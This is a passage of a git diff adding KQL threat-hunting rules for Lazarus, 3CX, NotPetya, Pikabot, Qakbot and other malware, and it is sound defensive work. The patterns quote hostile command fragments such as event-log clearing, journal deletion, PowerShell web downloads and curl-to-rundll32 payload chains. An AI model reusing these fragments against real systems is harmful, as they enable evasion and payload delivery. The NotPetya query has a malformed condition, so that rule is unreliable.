b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql @@ -0,0 +1,12 @@ +// Title: Lazarus APT DLL Sideloading Activity +// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: high +// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\colorcpl.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\colorui.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\HID.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe" and FolderPath =~ "C:\\ProgramData\\Oracle\\Java\\mapistub.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe" and FolderPath =~ ":\\ProgramShared\\mscoree.dll") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql new file mode 100644 index 00000000..58cbc6eb --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql @@ -0,0 +1,12 @@ +// Title: Lazarus System Binary Masquerading +// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) +// Date: 2020-06-03 +// Level: high +// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\msdtc.exe" or FolderPath endswith "\\gpsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql new file mode 100644 index 00000000..03e80c6b --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql @@ -0,0 +1,12 @@ +// Title: Malicious DLL Load By Compromised 3CXDesktopApp +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-31 +// Level: critical +// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (SHA256 startswith "7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896" or SHA256 startswith "11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03" or SHA256 startswith "F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952" or SHA256 startswith "8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423") or (SHA1 startswith "BF939C9C261D27EE7BB92325CC588624FCA75429" or SHA1 startswith "20D554A80D759C50D6537DD7097FED84DD258B3E" or SHA1 startswith "894E7D4FFD764BB458809C7F0643694B036EAD30" or SHA1 startswith "3B3E778B647371262120A523EB873C20BB82BEAF") or (MD5 startswith "74BC2D0B6680FAA1A5A76B27E5479CBC" or MD5 startswith "82187AD3F0C6C225E2FBA0C867280CC9" or MD5 startswith "11BC82A9BD8297BD0823BCE5D6202082" or MD5 startswith "7FAEA2B01796B80D180399040BB69835") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql new file mode 100644 index 00000000..6f1cf2ee --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql @@ -0,0 +1,10 @@ +// Title: NotPetya Ransomware Activity +// Author: Florian Roth (Nextron Systems), Tom Ueltschi +// Date: 2019-01-16 +// Level: critical +// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats + +DeviceProcessEvents +| where "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" or ProcessCommandLine endswith ".dat #1" or ProcessCommandLine endswith ".zip.dll\",#1") and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine contains "wevtutil cl Application & fsutil usn deletejournal /D C:" or ProcessCommandLine contains "dllhost.dat %WINDIR%\\ransoms") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql new file mode 100644 index 00000000..9e970a18 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql @@ -0,0 +1,11 @@ +// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE +// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-01-26 +// Level: high +// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Installer\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf,") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".cpl\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".inf" or ProcessCommandLine endswith ".inf\"" or ProcessCommandLine endswith ".cpl'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".inf'")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql new file mode 100644 index 00000000..aab412c6 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql @@ -0,0 +1,10 @@ +// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 +// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-02 +// Level: medium +// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "\\AppData\\Local\\" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains ",DllEntry" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql new file mode 100644 index 00000000..8985cf3b --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Compromised 3CXDesktopApp Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects execution of known compromised version of 3CXDesktopApp +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats +// False Positives: +// - Legitimate usage of 3CXDesktopApp + +DeviceProcessEvents +| where ((ProcessVersionInfoOriginalFileName =~ "3CXDesktopApp.exe" or FolderPath endswith "\\3CXDesktopApp.exe" or ProcessVersionInfoProductName =~ "3CX Desktop App") and ProcessVersionInfoProductVersion contains "18.12.") or ((SHA256 startswith "DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC" or SHA256 startswith "54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02" or SHA256 startswith "D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE" or SHA256 startswith "FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405" or SHA256 startswith "5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734" or SHA256 startswith "A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203" or SHA256 startswith "AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868" or SHA256 startswith "59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983") or (SHA1 startswith "480DC408EF50BE69EBCF84B95750F7E93A8A1859" or SHA1 startswith "3B43A5D8B83C637D00D769660D01333E88F5A187" or SHA1 startswith "6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA" or SHA1 startswith "E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1" or SHA1 startswith "8433A94AEDB6380AC8D4610AF643FB0E5220C5CB" or SHA1 startswith "413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5" or SHA1 startswith "BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA" or SHA1 startswith "BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E") or (MD5 startswith "BB915073385DD16A846DFA318AFA3C19" or MD5 startswith "08D79E1FFFA244CC0DC61F7D2036ACA9" or MD5 startswith "4965EDF659753E3C05D800C6C8A23A7A" or MD5 startswith "9833A4779B69B38E3E51F04E395674C6" or MD5 startswith "704DB9184700481A56E5100FB56496CE" or MD5 startswith "8EE6802F085F7A9DF7E0303E65722DC0" or MD5 startswith "F3D4144860CA10BA60F7EF4D176CC736" or MD5 startswith "0EEB1C0133EB4D571178B2D9D14CE3E9")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql new file mode 100644 index 00000000..7e7e0e57 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Compromised 3CXDesktopApp Update Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "--update" and ProcessCommandLine contains "http" and ProcessCommandLine contains "/electron/update/win32/18.12") and FolderPath endswith "\\3CXDesktopApp\\app\\update.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql new file mode 100644 index 00000000..68d1c51c --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql @@ -0,0 +1,12 @@ +// Title: Potential Devil Bait Malware Reconnaissance +// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea) +// Date: 2023-05-15 +// Level: high +// Description: Detects specific process behavior observed with Devil Bait samples +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "ipconfig\\s+/all" or (ProcessCommandLine contains "dir" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist")) and (ProcessCommandLine contains ">>%APPDATA%\\Microsoft\\" and (ProcessCommandLine endswith ".xml" or ProcessCommandLine endswith ".txt") and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql new file mode 100644 index 00000000..330a18cb --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql @@ -0,0 +1,12 @@ +// Title: Potential Devil Bait Related Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\" and (FolderPath endswith ".txt" or FolderPath endswith ".xml") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql new file mode 100644 index 00000000..72bbf53f --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_dridex_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Dridex Activity +// Author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-01-10 +// Level: critical +// Description: Detects potential Dridex acitvity via specific process patterns +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.discovery, attack.t1135, attack.t1033, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") and FolderPath endswith "\\svchost.exe") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"))) or (((ProcessCommandLine contains " -s " or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and FolderPath endswith "\\regsvr32.exe" and InitiatingProcessFolderPath endswith "\\excel.exe") and (not(ProcessCommandLine contains ".dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and ((ProcessCommandLine contains " /all" and FolderPath endswith "\\whoami.exe") or (ProcessCommandLine contains " view" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql new file mode 100644 index 00000000..6d8e6e06 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_emotet_rundll32_execution.kql @@ -0,0 +1,10 @@ +// Title: Potential Emotet Rundll32 Execution +// Author: FPT.EagleEye +// Date: 2020-12-25 +// Level: critical +// Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine endswith ",RunDLL" or ProcessCommandLine endswith ",Control_RunDLL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((InitiatingProcessFolderPath endswith "\\tracker.exe" or (ProcessCommandLine endswith ".dll,Control_RunDLL" or ProcessCommandLine endswith ".dll\",Control_RunDLL" or ProcessCommandLine endswith ".dll',Control_RunDLL")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql new file mode 100644 index 00000000..d166b902 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_empiremonkey_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential EmpireMonkey Activity +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-04-02 +// Level: high +// Description: Detects potential EmpireMonkey APT activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "/e:jscript" and ProcessCommandLine contains "\\Local\\Temp\\Errors.bat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql new file mode 100644 index 00000000..2ae3cece --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql @@ -0,0 +1,10 @@ +// Title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\GoogleUpdate.exe" and InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe") and (not(((FolderPath startswith "C:\\Program Files\\Google\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\") or FolderPath contains "\\AppData\\Local\\Google\\Update\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql new file mode 100644 index 00000000..25babf40 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql @@ -0,0 +1,12 @@ +// Title: Potential Kapeka Decrypted Backdoor Indicator +// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-03 +// Level: high +// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. +The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents +| where ((FolderPath contains ":\\ProgramData\\" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "\\\\[a-zA-Z]{5,6}\\.wll") or (FolderPath endswith "\\win32log.exe" or FolderPath endswith "\\crdss.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql new file mode 100644 index 00000000..46aad136 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_ke3chang_tidepool_malware_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Ke3chang/TidePool Malware Activity +// Author: Markus Neis, Swisscom +// Date: 2020-06-18 +// Level: high +// Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 +// MITRE Tactic: Defense Evasion +// Tags: attack.g0004, attack.defense-evasion, attack.t1562.001, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "-Property DWORD -name DisableFirstRunCustomize -value 2 -Force" or ProcessCommandLine contains "-Property String -name Check_Associations -value" or ProcessCommandLine contains "-Property DWORD -name IEHarden -value 0 -Force" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql new file mode 100644 index 00000000..908034f0 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_muddywater_apt_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential MuddyWater APT Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-10 +// Level: high +// Description: Detects potential Muddywater APT activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "vbscript:Close(Execute(\"CreateObject(" and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-w 1 -exec Bypass" and ProcessCommandLine contains "\\ProgramData\\") or (ProcessCommandLine contains "[Convert]::ToBase64String" and ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]" and ProcessCommandLine contains "GetResponse().GetResponseStream()" and ProcessCommandLine contains "[System.Net.HttpWebRequest]::Create(" and ProcessCommandLine contains "-bxor ") or (ProcessCommandLine contains "Win32_OperatingSystem" and ProcessCommandLine contains "Win32_NetworkAdapterConfiguration" and ProcessCommandLine contains "root\\SecurityCenter2" and ProcessCommandLine contains "[System.Net.DNS]") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql new file mode 100644 index 00000000..28666930 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql @@ -0,0 +1,13 @@ +// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE +// Author: Alejandro Houspanossian ('@lekz86') +// Date: 2024-01-02 +// Level: medium +// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. +Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files. +In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c") and (ProcessCommandLine contains " curl" or ProcessCommandLine contains " wget" or ProcessCommandLine contains " timeout " or ProcessCommandLine contains " ping ") and (ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " mkdir ") and (ProcessCommandLine contains " & " or ProcessCommandLine contains " || ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql new file mode 100644 index 00000000..3bbf2b20 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_qakbot_rundll32_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Qakbot Rundll32 Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-24 +// Level: high +// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains ".dll" and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql new file mode 100644 index 00000000..783e71f2 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Raspberry Robin CPL Execution Activity +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-03-07 +// Level: high +// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. +This behavior was observed in multiple Raspberry-Robin variants. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".CPL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\control.exe") and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql new file mode 100644 index 00000000..e1c48f91 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/ps_exe_renamed_sysinternals_tool.kql @@ -0,0 +1,12 @@ +// Title: Ps.exe Renamed SysInternals Tool +// Author: Florian Roth (Nextron Systems) +// Date: 2017-10-22 +// Level: high +// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats +// False Positives: +// - Renamed SysInternals tool + +DeviceProcessEvents +| where ProcessCommandLine contains "ps.exe -accepteula" and ProcessCommandLine contains "-s cmd /c netstat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql new file mode 100644 index 00000000..82745567 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_regsvr32_calc_pattern.kql @@ -0,0 +1,12 @@ +// Title: Qakbot Regsvr32 Calc Pattern +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: high +// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s") and ProcessCommandLine endswith " calc" and FolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql new file mode 100644 index 00000000..96c97fea --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_exports_execution.kql @@ -0,0 +1,12 @@ +// Title: Qakbot Rundll32 Exports Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-05-24 +// Level: critical +// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine endswith "aslr" or ProcessCommandLine endswith "bind" or ProcessCommandLine endswith "DrawThemeIcon" or ProcessCommandLine endswith "GG10" or ProcessCommandLine endswith "GL70" or ProcessCommandLine endswith "jhbvygftr" or ProcessCommandLine endswith "kjhbhkjvydrt" or ProcessCommandLine endswith "LS88" or ProcessCommandLine endswith "Motd" or 